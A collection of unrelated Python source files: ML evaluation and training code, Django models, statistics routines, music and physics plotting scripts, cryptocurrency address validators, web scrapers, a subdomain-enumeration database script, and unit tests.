    batch_outputs = outputs.cpu().numpy()
    batch_masks = partial_masks.cpu().numpy()
    for sample_out, sample_mask, seq_len in zip(batch_outputs, batch_masks, seq_lens):
        pred_spans = set()
        gold_spans = set()
        for i in range(seq_len):
            for j in range(seq_len):
                cell = sample_out[i][j]
                # Non-negative cells are decoded spans; only ids below
                # label_size are real (non-latent) labels.
                if 0 <= cell < label_size:
                    pred_spans.add("{}_{}_{}".format(i, j, int(cell)))
                for k in range(label_size):
                    if sample_mask[i][j][k] == 1:
                        gold_spans.add("{}_{}_{}".format(i, j, k))
        n_pred += len(pred_spans)
        n_gold += len(gold_spans)
        n_correct += len(pred_spans & gold_spans)
    return n_correct, n_pred, n_gold
|
990,952 | f729f0424aec4725e5525873dbfa5a5cbfddbbfe | # Generated by Django 3.1 on 2021-05-14 23:04
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated schema migration: adds the boolean "activo" flag
    # (default True) to the Productos.productos model.

    dependencies = [
        ('Productos', '0001_initial'),
    ]

    operations = [
        migrations.AddField(
            model_name='productos',
            name='activo',
            field=models.BooleanField(default=True, verbose_name='Activo'),
        ),
    ]
|
990,953 | ce7a4cca9a9c0f68485006c6d08d602366ff4532 | import numpy as np
from numpy import ones, zeros, diag, sqrt, r_, atleast_2d
from numpy import sum as npsum
from numpy.linalg import solve, norm
from sklearn.covariance import graph_lasso
from FPmeancov import FPmeancov
from LassoRegFP import LassoRegFP
# from GraphLasso import GraphLasso
def RobustLassoFPReg(X,Z,p,nu,tol,lambda_beta=0,lambda_phi=0,flag_rescale=0):
    # Robust Regression - Max-Likelihood with Flexible Probabilites & Shrinkage
    # (multivariate Student t distribution with given degrees of freedom = nu)
    #  INPUTS
    #   X            : [matrix] (n_ x t_end ) historical series of dependent variables
    #   Z            : [matrix] (k_ x t_end) historical series of independent variables
    #   p            : [vector] flexible probabilities
    #   nu           : [scalar] multivariate Student's t degrees of freedom
    #   tol          : [scalar] or [vector] (3 x 1) tolerance, needed to check convergence
    #   lambda_beta  : [scalar] lasso regression parameter
    #   lambda_phi   : [scalar] graphical lasso parameter
    #   flag_rescale : [boolean flag] if 0 (default), the series is not rescaled
    #
    #  OPS
    #   alpha_RMLFP  : [vector] (n_ x 1) shifting term
    #   beta_RMLFP   : [matrix] (n_ x k_) optimal loadings
    #   sig2_RMLFP   : [matrix] (n_ x n_) matrix of residuals.T covariances
    # For details on the exercise, see here .
    ## Code
    [n_, t_] = X.shape
    k_ = Z.shape[0]
    # if FP are not provided, observations are equally weighted
    if p is None:
        p = ones((1,t_))/t_
    # adjust tolerance input
    if isinstance(tol, float):
        tol = [tol, tol, tol]
    # rescale variables
    if flag_rescale == 1:
        _,cov_Z=FPmeancov(Z, p)
        sig_Z = sqrt(diag(cov_Z))
        _,cov_X=FPmeancov(X,p)
        sig_X = sqrt(diag(cov_X))
        Z = np.diagflat(1/sig_Z)@Z
        X = np.diagflat(1/sig_X)@X
    # initialize variables (iteration history is stacked along the 3rd axis)
    alpha = zeros((n_,1))
    beta = zeros((n_,k_,1))
    sig2 = zeros((n_,n_,1))
    # 0. Initialize with a plain (unweighted-lasso) regression fit
    alpha[:,[0]], beta[:,:,[0]], sig2[:,:,[0]], U = LassoRegFP(X, Z, p, 0, 0)
    error = ones(3)*10**6
    maxIter = 500
    i = 0
    while any(error>tol) and (i < maxIter):
        i = i+1
        # 1. Update weights (Student-t E-step: Mahalanobis distances of residuals)
        z2 = np.atleast_2d(U).T@(solve(sig2[:,:,i-1],np.atleast_2d(U)))
        w = (nu+n_)/(nu+diag(z2).T)
        # 2. Update FP (reweight and renormalize the flexible probabilities)
        p_tilde = (p*w) / npsum(p*w)
        # 3. Update output
        # Lasso regression
        new_alpha, new_beta, new_sig2, U = LassoRegFP(X,Z,p_tilde,lambda_beta)
        new_beta = new_beta.reshape(n_,k_,1)
        new_sig2 = new_sig2.reshape(n_,n_,1)
        U = U.squeeze()
        # append this iteration's estimates to the history
        alpha = r_['-1',alpha,new_alpha]
        beta = r_['-1',beta,new_beta]
        sig2 = r_['-1',sig2,new_sig2]
        sig2[:,:,i] = npsum(p*w)*sig2[:,:,i]
        # Graphical lasso
        # NOTE(review): sklearn renamed graph_lasso to graphical_lasso in
        # newer releases — this code targets an older sklearn.
        if lambda_phi != 0:
            sig2[:,:,i],_,_,_=graph_lasso(sig2[:,:,i],lambda_phi)
        # 3. Check convergence (relative change of each estimate)
        error[0] = norm(alpha[:,i]-alpha[:,i-1])/norm(alpha[:,i-1])
        error[1] = norm(beta[:,:,i]-beta[:,:,i-1],ord='fro')/norm(beta[:,:,i-1],ord='fro')
        error[2] = norm(sig2[:,:,i]-sig2[:,:,i-1],ord='fro')/norm(sig2[:,:,i-1],ord='fro')
    # Output: last iterate of each estimate
    alpha_RMLFP = alpha[:,-1]
    beta_RMLFP = beta[:,:,-1]
    sig2_RMLFP = sig2[:,:,-1]
    # From rescaled variables to non-rescaled variables
    if flag_rescale == 1:
        alpha_RMLFP = diag(sig_X)@alpha_RMLFP
        beta_RMLFP = diag(sig_X)@beta_RMLFP @diag(1/sig_Z)
        sig2_RMLFP = diag(sig_X)@sig2_RMLFP@diag(sig_X).T
    return alpha_RMLFP, beta_RMLFP, sig2_RMLFP
|
990,954 | 56890266a2b54a68b8a4256f9538fcd44295bfb9 | Clock.bpm = 120
# Live-coding session script — presumably FoxDot (Clock, Root, Scale, play,
# bass, ambi, var all come from its namespace; confirm against the runtime).
Root.default = 'C'
Scale.default = Scale.major
# Percussion players driven by sample-pattern strings.
d1 >> play("----", amp=1, sample=3, dur=1, formant=0)
d2 >> play("x x x x", sample=3, formant=0).every(4, "stutter", 2)
d3 >> play(" |o5|", dur=2, lpf=1200)
# Bass line plus an ambient pad on the same degrees; the pad adds a
# time-varying chord sequence on top.
b1 >> bass([0, -2.5, -3, -3], dur=[3, 5], amp=0.5)
b2 >> ambi([0, -2.5, -3, -3], dur=[3, 5], amp=0.5, drive=0.05, tremolo=2) + var([(0, 4, 7), (0,3,5), (0,4,6), (0,4,6)])
|
990,955 | 3f636acbb7c778ea534ca99f4d60f7d4ed61704f |
import binascii
from .. import encoding
from ..networks import DEFAULT_NETCODES, NETWORK_NAMES, NETWORKS
from ..serialize import h2b
DEFAULT_ADDRESS_TYPES = ["address", "pay_to_script"]
def _generate_network_prefixes():
    """Map each known binary prefix to the list of (network, field-name)
    pairs that use it, across all registered networks."""
    prefixes = {}
    for network in NETWORKS:
        for field in "wif address pay_to_script prv32 pub32".split():
            prefix = getattr(network, field, None)
            if prefix:
                prefixes.setdefault(prefix, []).append((network, field))
    return prefixes
NETWORK_PREFIXES = _generate_network_prefixes()
def netcode_and_type_for_data(data, netcodes=NETWORK_NAMES):
    """
    Given some already-decoded raw data from a base58 string,
    return (N, T) where N is the network code ("BTC" or "LTC") and
    T is the data type ("wif", "address", "public_pair", "prv32", "pub32").
    May also raise EncodingError.
    """
    # Try the 4-byte prefixes first, then the 1-byte ones, so a 1-byte match
    # overrides a 4-byte match for the same network code.
    matches = {}
    for prefix_len in (4, 1):
        for network, kind in NETWORK_PREFIXES.get(data[:prefix_len], []):
            matches[network.code] = kind
    # Return the first allowed netcode that matched.
    for netcode in netcodes:
        kind = matches.get(netcode)
        if kind:
            return netcode, kind
    raise encoding.EncodingError("unknown prefix")
def netcode_and_type_for_text(text):
    """Classify a text key/address: try a raw-hex interpretation first
    (keyed purely on byte length), then fall back to hashed base58."""
    length_to_type = {
        33: "public_pair",
        65: "public_pair",
        16: "elc_seed",
        32: "elc_prv",
        64: "elc_pub",
    }
    # check for "public pair" (and other fixed-length hex encodings)
    try:
        as_bin = h2b(text)
    except (binascii.Error, TypeError):
        pass
    else:
        kind = length_to_type.get(len(as_bin))
        if kind is not None:
            return None, kind, as_bin
    data = encoding.a2b_hashed_base58(text)
    netcode, the_type = netcode_and_type_for_data(data)
    # wif/address use a 1-byte prefix; the BIP32 keys use 4 bytes.
    prefix_len = 1 if the_type in ["wif", "address"] else 4
    return netcode, the_type, data[prefix_len:]
def _check_against(text, expected_type, allowable_netcodes):
    """Decode `text` and return its netcode when both its type and network
    are allowed; return None on any decode failure or mismatch."""
    try:
        decoded = encoding.a2b_hashed_base58(text)
        netcode, found_type = netcode_and_type_for_data(decoded, netcodes=allowable_netcodes)
    except encoding.EncodingError:
        return None
    if found_type in expected_type and netcode in allowable_netcodes:
        return netcode
    return None
def is_address_valid(address, allowable_types=DEFAULT_ADDRESS_TYPES, allowable_netcodes=DEFAULT_NETCODES):
    """
    Accept an address, and a list of allowable address types (a subset of "address" and "pay_to_script"),
    and allowable networks (defaulting to just Bitcoin mainnet), return the network that the address is
    a part of, or None if it doesn't validate.
    """
    # Thin wrapper over _check_against with the caller-supplied type list.
    return _check_against(address, allowable_types, allowable_netcodes)
def is_wif_valid(wif, allowable_netcodes=DEFAULT_NETCODES):
    """
    Accept a WIF, and a list of allowable networks (defaulting to just Bitcoin mainnet), return
    the network that the wif is a part of, or None if it doesn't validate.
    """
    # Only the "wif" data type is accepted here.
    return _check_against(wif, ["wif"], allowable_netcodes)
def is_public_bip32_valid(hwif, allowable_netcodes=DEFAULT_NETCODES):
    """
    Accept a text representation of a BIP32 public wallet, and a list of allowable networks (defaulting
    to just Bitcoin mainnet), return the network that the wif is a part of, or None if it doesn't validate.
    """
    # Only the "pub32" (xpub-style) data type is accepted here.
    return _check_against(hwif, ["pub32"], allowable_netcodes)
def is_private_bip32_valid(hwif, allowable_netcodes=DEFAULT_NETCODES):
    """
    Accept a text representation of a BIP32 private wallet, and a list of allowable networks (defaulting
    to just Bitcoin mainnet), return the network that the wif is a part of, or None if it doesn't validate.
    """
    # Only the "prv32" (xprv-style) data type is accepted here.
    return _check_against(hwif, ["prv32"], allowable_netcodes)
|
990,956 | 07dfae53d2c5a23be3f526201d6884a866e48bc0 | from ROOT import TFile, TTree, gROOT, TH1F, TCanvas, gStyle, TF1, TProfile, TH2F
from sys import exit
import os
#import argparse
# --- Open the four input ROOT files ------------------------------------
# BUG FIX: the original guards read `file.IsOpen == False`, which compares
# the *bound method object* itself to False and is therefore always False,
# so the error branch could never fire. TFile::IsOpen() must be called.
# (Single-argument print(...) behaves identically under Python 2 and 3.)

# Open Jan TDR analysis file
janName = 'Run-497-TDR-Analysis'
janFileName = janName + '-BeamPeriod.root'
janFile = TFile(janFileName, 'READ')
if not janFile.IsOpen():
    print("ERROR: ROOT file does not exist")
    exit(-1)
janDir = janFile.Get(janName)
# Open Jan sim TDR analysis file
simName = 'Run-SIM-TDR-Analysis'
janSimFileName = simName + '-JanBeamPeriod.root'
janSimFile = TFile(janSimFileName, 'READ')
if not janSimFile.IsOpen():
    print("ERROR: ROOT file does not exist")
    exit(-1)
janSimDir = janSimFile.Get(simName)
# Open April TDR analysis file
aprName = 'Run-1300-TDR-Analysis'
aprFileName = aprName + '-BeamPeriod.root'
aprFile = TFile(aprFileName, 'READ')
if not aprFile.IsOpen():
    print("ERROR: ROOT file does not exist")
    exit(-1)
aprDir = aprFile.Get(aprName)
# Open April sim TDR analysis file (same simulation run, April beam period)
aprSimFileName = simName + '-AprBeamPeriod.root'
aprSimFile = TFile(aprSimFileName, 'READ')
if not aprSimFile.IsOpen():
    print("ERROR: ROOT file does not exist")
    exit(-1)
aprSimDir = aprSimFile.Get(simName)
# Hit times, January data (pad 1) vs simulation (pad 2).
beamPeriodCanvas = TCanvas("beamPeriodCanvas","Hit times [ns] (data and sim)", 1000, 600)
beamPeriodCanvas.SetTitle('')
beamPeriodCanvas.Divide(2,1)
beamPeriodCanvas.cd(1)
janHitTimeHist = janDir.Get('Hit_Time_Structure_Channel_8')
janHitTimeHist.GetXaxis().SetRangeUser(115e3,170e3)
#janHitTimeHist.SetTitle('Hits times (January data)')
janHitTimeHist.SetTitle('(a)')
janHitTimeHist.GetXaxis().SetTitle('Hit time [ns]')
janHitTimeHist.GetYaxis().SetTitle('Counts')
janHitTimeHist.GetYaxis().SetTitleOffset(1.5)
janHitTimeHist.SetStats(False)
janHitTimeHist.Draw()
beamPeriodCanvas.cd(2)
janSimHitTimeHist = janSimDir.Get('Hit_Time_Structure_Channel_0')
janSimHitTimeHist.GetXaxis().SetRangeUser(115e3,170e3)
#janSimHitTimeHist.SetTitle('Hits times (Simulation)')
janSimHitTimeHist.SetTitle('(b)')
janSimHitTimeHist.GetXaxis().SetTitle('Hit time [ns]')
janSimHitTimeHist.GetYaxis().SetTitle('Counts')
janSimHitTimeHist.GetYaxis().SetTitleOffset(1.5)
janSimHitTimeHist.SetStats(False)
janSimHitTimeHist.Draw()
#Wait for user input
raw_input("Press Enter to continue...")  # Python 2 builtin (input() in Py3)
# Hit-time gaps between consecutive straw hits, January data (pad 1)
# vs simulation (pad 2).
janGapsCanvas = TCanvas("janGapsCanvas","", 1000, 600)
janGapsCanvas.Divide(2,1)
janGapsCanvas.cd(1)
janTimeGapsHist = janDir.Get('Straw_Hit_Time_Gaps_Channel_8')
janTimeGapsHist.GetXaxis().SetRangeUser(6e3,40e3)
#janTimeGapsHist.SetTitle('Time gaps between consecutive straw hits (January data)')
janTimeGapsHist.SetTitle('(a)')
janTimeGapsHist.GetXaxis().SetTitle('Hit time [ns]')
janTimeGapsHist.GetYaxis().SetTitle('Counts')
janTimeGapsHist.GetYaxis().SetTitleOffset(1.5)
janTimeGapsHist.SetStats(False)
janTimeGapsHist.Draw()
janGapsCanvas.cd(2)
janSimTimeGapsHist = janSimDir.Get('Straw_Hit_Time_Gaps_Channel_0')
janSimTimeGapsHist.GetXaxis().SetRangeUser(6e3,40e3)
# CONSISTENCY FIX: the long descriptive SetTitle call below had lost its
# comment marker (a stray lone '#' preceded it) and was executed, only to
# be immediately overridden by SetTitle('(b)'). It is commented out again
# to match the sibling sections; the displayed title is unchanged.
#janSimTimeGapsHist.SetTitle('Time gaps between consecutive straw hits (Simulation)')
janSimTimeGapsHist.SetTitle('(b)')
janSimTimeGapsHist.GetXaxis().SetTitle('Hit time [ns]')
janSimTimeGapsHist.GetYaxis().SetTitle('Counts')
janSimTimeGapsHist.GetYaxis().SetTitleOffset(1.5)
janSimTimeGapsHist.SetStats(False)
janSimTimeGapsHist.Draw()
#Wait for user input
raw_input("Press Enter to continue...")
# Hit-time gaps between consecutive straw hits, April data (pad 1)
# vs simulation (pad 2).
aprGapsCanvas = TCanvas("aprGapsCanvas","", 1000, 600)
aprGapsCanvas.Divide(2,1)
aprGapsCanvas.cd(1)
aprTimeGapsHist = aprDir.Get('Straw_Hit_Time_Gaps_Channel_8')
aprTimeGapsHist.GetXaxis().SetRangeUser(9e3,40e3)
#aprTimeGapsHist.SetTitle('Time gaps between consecutive straw hits (April data)')
aprTimeGapsHist.SetTitle('(a)')
aprTimeGapsHist.GetXaxis().SetTitle('Hit time [ns]')
aprTimeGapsHist.GetYaxis().SetTitle('Counts')
aprTimeGapsHist.GetYaxis().SetTitleOffset(1.5)
aprTimeGapsHist.SetStats(False)
aprTimeGapsHist.Draw()
aprGapsCanvas.cd(2)
aprSimTimeGapsHist = aprSimDir.Get('Straw_Hit_Time_Gaps_Channel_0')
aprSimTimeGapsHist.GetXaxis().SetRangeUser(9e3,40e3)
#aprSimTimeGapsHist.SetTitle('Time gaps between consecutive straw hits (Simulation)')
aprSimTimeGapsHist.SetTitle('(b)')
aprSimTimeGapsHist.GetXaxis().SetTitle('Hit time [ns]')
aprSimTimeGapsHist.GetYaxis().SetTitle('Counts')
aprSimTimeGapsHist.GetYaxis().SetTitleOffset(1.5)
aprSimTimeGapsHist.SetStats(False)
aprSimTimeGapsHist.Draw()
#Wait for user input
raw_input("Press Enter to continue...")  # Python 2 builtin (input() in Py3)
|
990,957 | 89ab79c0639406402d2a96878615a57c5a5d5b96 | #sıradan
# Plain tuple assignment.
element=(1,2)
print(element)
# Element-by-element access via unpacking.
x,y =(1,2)
print(x)
print(y)
# Example 2: use _ to discard a value we don't need.
x,_ =(1,2)
print(x)
#print(y)
# Example 3: a starred target collects the remaining values into a list.
x,y,*z =(1,2,3,4,5,6)
print(x)
print(y)
print(z)
# Example 4: starred target in the middle; t always gets the final value.
x,y,*z,t =(1,2,3,4,5,6)
print(x)
print(y)
print(z)
print(t)
# Even if we commented z out, t would still always receive the last value.
|
990,958 | db52faff7c91ca7b855add1493ccbad4319f126e | from AI.vocab.CaptionVocab import load_voca,load_tokenized_data,save_tokenized_data,tokenized_data
from AI.dataload.CaptionDataManagement import make_caption_loader
from AI.models.Captionmodel.Encoder import EncoderCNN
from AI.models.Captionmodel.Decoder import DecoderRNN
import torch
import torch.nn as nn
import torch.optim as optim
from torch.nn.utils.rnn import pack_padded_sequence
from transformers import AdamW,get_linear_schedule_with_warmup
from tqdm import tqdm, trange
import json
def caption_train(vocab_path, image_path, cfg, caption_path, word2idx_path=None):
    """Train the CNN encoder / RNN decoder captioning model.

    Args:
        vocab_path: path of the pickled vocabulary loaded by load_voca.
        image_path: root directory of the training images.
        cfg: dict of hyperparameters (caption_batch, caption_embed_size,
            caption_hidden_size, caption_hidden_layer, caption_epoch).
        caption_path: raw caption file, tokenized when no cache is given.
        word2idx_path: optional path to an already-tokenized dataset cache.

    Returns:
        (loss_record, encoder, decoder): logged average losses plus the
        trained encoder and decoder modules.
    """
    voca = load_voca(vocab_path)
    # Reuse the tokenized cache when available; otherwise tokenize and cache.
    if word2idx_path is not None:
        dataset = load_tokenized_data(word2idx_path)
    else:
        dataset = tokenized_data(caption_path, voca, type="train")
        save_tokenized_data(dataset, type="train")
    batch = cfg['caption_batch']
    embed_size = cfg['caption_embed_size']
    hidden_size = cfg['caption_hidden_size']
    hidden_layer = cfg['caption_hidden_layer']
    epochs = cfg['caption_epoch']
    loader = make_caption_loader(dataset, batch, image_path)
    device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
    encoder = EncoderCNN(embed_size)
    decoder = DecoderRNN(embed_size,len(voca),hidden_layers_num=hidden_layer,hidden_size=hidden_size)
    encoder.to(device)
    decoder.to(device)
    learning_rate = 5e-5
    adam_epsilon = 1e-8
    loss_function = nn.CrossEntropyLoss()
    # Only the encoder's projection head (linear + batch-norm) is trained;
    # the decoder is trained in full.
    param_list = list(encoder.linear.parameters()) + list(encoder.bn.parameters()) + list(decoder.parameters())
    optimizer = AdamW(param_list, lr=learning_rate, eps=adam_epsilon)
    num_training_steps = len(loader) * epochs
    # Linear LR decay without warmup.
    scheduler = get_linear_schedule_with_warmup(
        optimizer, num_warmup_steps=0, num_training_steps=num_training_steps
    )
    global_step = 0
    epochs_trained = 0
    tr_loss = 0.0
    logging_loss = 0.0
    train_iterator = trange(
        epochs_trained, int(epochs), desc="Epoch"
    )
    logging_steps = 500
    loss_record = []
    for epoch in train_iterator:
        epoch_iterator = tqdm(loader, desc="Iteration")
        for idx_of_batch,(images, word2idxes,length) in enumerate(epoch_iterator):
            images,word2idxes = images.to(device),word2idxes.to(device)
            features = encoder(images)
            # Pack the padded targets so loss ignores padding positions.
            compare_targets = pack_padded_sequence(word2idxes,length,batch_first=True).data
            output = decoder(word2idxes,features,length)
            loss = loss_function(output,compare_targets)
            optimizer.zero_grad()
            loss.backward()
            optimizer.step()
            scheduler.step()
            tr_loss += loss.item()
            global_step += 1
            # Every `logging_steps` steps, log the mean loss since last log.
            if logging_steps > 0 and global_step % logging_steps == 0:
                logs = {}
                loss_scalar = (tr_loss - logging_loss) / logging_steps
                learning_rate_scalar = scheduler.get_last_lr()[0]
                logs["learning_rate"] = learning_rate_scalar
                logs["loss"] = loss_scalar
                loss_record.append(loss_scalar)
                logging_loss = tr_loss
                epoch_iterator.write(json.dumps({**logs, **{"step": global_step}}))
    return loss_record,encoder,decoder
990,959 | 1d7498eaadabcd78a74c65c0c086953d51ae6bc4 | from django.db import models
from django.urls import reverse
# ORM : OBEJCT RELATIONAL MAPPING
# Create your models here.
class course_info(models.Model):
    # Course catalogue entry (name, description, duration, fees).
    # NOTE(review): "descrition" is a typo for "description"; renaming the
    # field would require a schema migration, so it is only flagged here.
    #member variable
    name=models.CharField(max_length=30)
    descrition=models.TextField()
    duration=models.IntegerField()
    fees=models.IntegerField()
    #member function
    def __str__(self):
        # Human-readable representation (used by the admin and shell).
        return f"{self.name}"
    def get_absolute_url(self):
        # NOTE(review): reverse('view') passes no args — assumes the URL
        # pattern named 'view' needs no pk/slug; confirm against urls.py.
        return reverse('view')
990,960 | eee229d0947f2f0713aa80073e2caf4230d2fb75 | from sebastian.src.ChoraleAnalysis.ChoraleAnalysis import XMLChoraleAnalysis
import sebastian.tests.testfiles.TestFilePaths as TestFilePaths
from sebastian.src.SebastianStructures import Constants
from sebastian.src.Utils.Utils import *
from music21 import note
import unittest
class ParallelUnisonIntegrationTests(unittest.TestCase):
    """Integration tests for parallel-unison detection in chorale analysis."""
    def test_ThrowsErrorWithParallelUnisons(self):
        # The fixture score contains exactly one parallel unison.
        analysis = XMLChoraleAnalysis(TestFilePaths.parallel_unison)
        analysis.analyze()
        errors = analysis.get_error_list("ParallelUnisonError")
        self.assertEqual(1, len(errors))
    def test_CorrectPropertiesOnParallelUnisonError(self):
        # Verify every reported property of the single expected error:
        # interval name, the two offending parts, their measure/beat
        # positions, and the four notes involved (C4->D4 in both voices).
        analysis = XMLChoraleAnalysis(TestFilePaths.parallel_unison)
        analysis.analyze()
        error = get_only_element(analysis.get_error_list("ParallelUnisonError"))
        self.assertEqual("Unison", error.get_interval_name())
        self.assertEqual(Constants.ALTO_PART_NUMBER, error.get_part_number_1())
        self.assertEqual(Constants.TENOR_PART_NUMBER, error.get_part_number_2())
        self.assertEqual(2, error.get_measure_1())
        self.assertEqual(1.0, error.get_beat_1())
        self.assertEqual(2, error.get_measure_2())
        self.assertEqual(2.0, error.get_beat_2())
        self.assertEqual(note.Note("C4"), error.get_notes()[0])
        self.assertEqual(note.Note("D4"), error.get_notes()[1])
        self.assertEqual(note.Note("C4"), error.get_notes()[2])
        self.assertEqual(note.Note("D4"), error.get_notes()[3])
if __name__ == "__main__":
unittest.main() |
990,961 | 65cf0ba746ccc59bbb6d96fca5250447c1815b57 | #用request+beautifulsoup抓取tripadvisor
print('hi')
from bs4 import BeautifulSoup
import requests
import time#为了做一个保护
#模拟登陆:
'''
headers = {
'User-Agent':'ctrl+v'
'Cookie':'ctrl+v'
}
url=''
wb_data = requests.get(url,headers=headers)
soup = BeautifulSoup(wb_data.text,'lxml')
'''
url=('https://mp.weixin.qq.com/s/xu-rtXSKy9oWkrOc_13wqw')
def get_data(url,data=None) :#定义一个函数:一个小技巧,不需要登陆或模拟登入后写data=None就会返回data的值
wb_data = requests.get(url)
time.sleep(1)#这是一个重要的保护措施
Soup = BeautifulSoup(wb_data.text,'lxml')
print(Soup)
get_data(url)
#get_data(url)#成功
#print(urls)#链接列表 成功
#for every_url in urls:
#get_data(every_url)#失败
'''
似乎有反爬取,。。。图片链接都一样 解决方案可以用移动端,新建一个文件 11.5,这次爬酒店的
'''
get_data(url) |
990,962 | 2bd4037127d967a20dc2785775ef3686a1de5fb4 | import scrapy
from ..items import WoodsItem
class ManningtonspiderSpider(scrapy.Spider):
    """Spider that walks Mannington's category search pages and yields one
    WoodsItem per product thumbnail."""
    name = 'manningtonSpider'
    allowed_domains = ['mannington.com']
    start_urls = ['https://mannington.com/']

    def parse(self, response):
        # The category landing pages are fixed; fan out one request each.
        category_urls = ['https://www.mannington.com/Residential/Adura-Vinyl-Plank/AduraMaxApex/Search',
                         'https://www.mannington.com/Residential/Adura-Vinyl-Plank/AduraMax/Search',
                         'https://www.mannington.com/Residential/Adura-Vinyl-Plank/AduraRigid/Search',
                         'https://www.mannington.com/Residential/Adura-Vinyl-Plank/AduraFlex/Search',
                         'https://www.mannington.com/Residential/Hardwood/Search',
                         'https://www.mannington.com/Residential/Laminate/Search',
                         'https://www.mannington.com/Residential/VinylSheet/LuxuryVinylSheet/Search',
                         'https://www.mannington.com/Residential/VinylSheet/Resilient/Search'
                         ]
        for category_url in category_urls:
            yield scrapy.Request(category_url, callback=self.parse_products)

    def parse_products(self, response):
        # One <div> per product thumbnail on the search results page.
        for thumb in response.xpath("//div[@class='product-thumbs']/div"):
            handle = thumb.xpath(".//a/@href").extract_first().split('/')[-1]
            first_span = thumb.xpath(".//span[1]/text()").extract_first()
            second_span = thumb.xpath(".//span[2]/text()").extract_first()
            # NOTE(review): span[2] is used twice here, exactly as in the
            # original extraction (span[3] may have been intended) —
            # preserved as-is.
            title = " ".join([first_span, second_span, second_span])
            item = WoodsItem()
            item['title'] = title
            item['handle'] = handle
            item['formattedcode'] = 'mannington' + '-' + handle
            item['vendor'] = 'mannington'
            yield item
990,963 | 1a9067bc15662bdfec6ec716a5c488ee242ea67b | #!/usr/bin/python
import os, sys, MySQLdb, time
sys.path.append(os.path.dirname(os.path.abspath(__file__)) + "/../../")
import credentials
# Python 2 script: enumerate subdomains of sys.argv[1] with sublist3r /
# subfinder / amass, merge with known domains from the database, probe which
# are online, and upsert the results (keyed on the given scan id).
# SECURITY(review): `domain` comes from argv and is interpolated into
# os.system() shell commands below -- a crafted argument is shell injection.
try:
    domain = sys.argv[1].strip()
    scanId = sys.argv[2]
    # Working directories under /tmp/ICU/<domain>/ for scanner output files.
    if not os.path.exists("/tmp/ICU"):
        os.makedirs("/tmp/ICU")
    if not os.path.exists("/tmp/ICU/"+domain+"/"):
        os.makedirs("/tmp/ICU/"+domain+"/")
    #Add new subdomain scanners here. Make sure to let them save the output to /tmp/ICU/{domain}/doains-all.txt
    os.system(os.path.dirname(os.path.abspath(__file__)) + "/../../tools/dependencies/sublister/sublist3r.py -o /tmp/ICU/"+domain+"/domains-all.txt -d "+domain)
    time.sleep(2)
    try:
        #Subfinder
        os.system("subfinder -d " + domain + " -v -o /tmp/ICU/"+domain+"/domains-subfinder.txt --timeout 6")
        time.sleep(2)
        #Amass
        os.system("amass -o /tmp/ICU/"+domain+"/domains-amass.txt -d " + domain)
        time.sleep(2)
    except Exception as e:
        print "An error occured; You probably dont have either subfinder or amass installed. Check the README.md to see you how to install them. Error: "
        print str(e)
    connection = MySQLdb.connect (host = credentials.database_server, user = credentials.database_username, passwd = credentials.database_password, db = credentials.database_name)
    cursor = connection.cursor()
    #Retrieve all info from a top domain and its subdomains, so we can use this data instead of opening new db connections later on
    cursor.execute("select Domain, TopDomainID, Active, Program, DomainID, scan_Id from domains where TopDomainID = (select DomainID from domains where Domain = %s) or Domain = %s", (domain, domain))
    database_data = cursor.fetchall()
    database_domains = [d[0] for d in database_data]
    # Active column is stored as a single byte; ord() decodes it to 0/1.
    non_active_subdomains = [x[0] for x in database_data if ord(x[2]) == False]
    program = [x[3] for x in database_data if x[0] == domain][0]
    topDomainID = [x[4] for x in database_data if x[0] == domain][0]
    #All the domains from the subdomain scanners
    domains_all = open("/tmp/ICU/"+domain+"/domains-all.txt",'r').read().split('\n')
    try:
        #Domains from subfinder
        domains_subfinder = open("/tmp/ICU/"+domain+"/domains-subfinder.txt",'r').read().split('\n')
        #Domains from amass
        domains_amass = open("/tmp/ICU/"+domain+"/domains-amass.txt",'r').read().split('\n')
        #Add the subfinder domains
        domains_all.extend(x for x in domains_subfinder if x not in domains_all)
        #unique
        domains_all = list(set(domains_all))
        #Add the amass domains
        domains_all.extend(x for x in domains_amass if x not in domains_all)
        #unique
        domains_all = list(set(domains_all))
    except Exception as e:
        print "An error occured; You probably dont have either subfinder or amass installed. Check the README.md to see you how to install them. Error: "
        print str(e)
    #Add all the database subdomain to it
    domains_all.extend(x for x in database_domains if x not in domains_all)
    #unique -- Unique each time after adding a new list, to limit ram usage
    domains_all = list(set(domains_all))
    #Put all the online domains in a domains-online.txt
    os.system(os.path.dirname(os.path.abspath(__file__)) + "/../../tools/online.py /tmp/ICU/"+domain+"/domains-all.txt /tmp/ICU/"+domain+"/domains-online.txt")
    #Convert online domains to array
    domains_online = open("/tmp/ICU/"+domain+"/domains-online.txt",'r').read().split('\n')
    #Loop through every subdomain
    for sub_domain in domains_all:
        #Get the scanID to insert. If the domains was already in the db and isnt changed, then keep the old scanID. otherwise use the scanID of the current scan
        insertScanId = scanId if not [x[5] for x in database_data if x[0] == sub_domain] else [x[5] for x in database_data if x[0] == sub_domain][0]
        #If the subdomain is online
        if sub_domain in domains_online:
            active=True
            #If the subdomain used to be offline, give it the current scanID
            if sub_domain in non_active_subdomains:
                insertScanId = scanId
        else:
            active=False
        if sub_domain:
            #Insert the new values, or update them if they already existed
            cursor.execute("INSERT INTO domains (Program, TopDomainID, Active, InScope, Domain, scan_Id) VALUES (%s, %s, %s, %s, %s, %s) ON DUPLICATE KEY UPDATE Active = %s, LastModified = now(), scan_Id = %s", (program, topDomainID, active, 1, sub_domain, insertScanId, active, insertScanId))
    connection.commit()
    cursor.close ()
    connection.close ()
except Exception as e:
    #Handle the errors, and save them to the database
    print "error in domains_db.py with main domain; " + domain
    cursor.execute("INSERT INTO errors (Domain, ErrorDescription, Error, Script, scan_Id) VALUES (%s, %s, %s, %s, %s) ", (domain, "error in domains_db.py with main domain; "+domain, e, "sublister_to_db.py", scanId))
    connection.commit()
    cursor.close()
    connection.close()
    print e
    sys.exit()
|
990,964 | b1670868f5a33460a203d07135cfabe1c91622da | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
import scrapy
import json
class MlbScrapeItem(scrapy.Item):
    # define the fields for your item here like:
    #name = scrapy.Field()
    def __init__(self, raw):
        # Deserialize a JSON string and copy every key onto the item.
        # NOTE(review): scrapy.Item.__init__ is never invoked (no super()
        # call), and setattr on an Item instance normally raises
        # AttributeError for keys that are not declared Fields -- confirm
        # this class actually works before relying on it.
        jobj = json.loads(raw)
        for key in jobj:
            setattr(self, key, jobj[key])
|
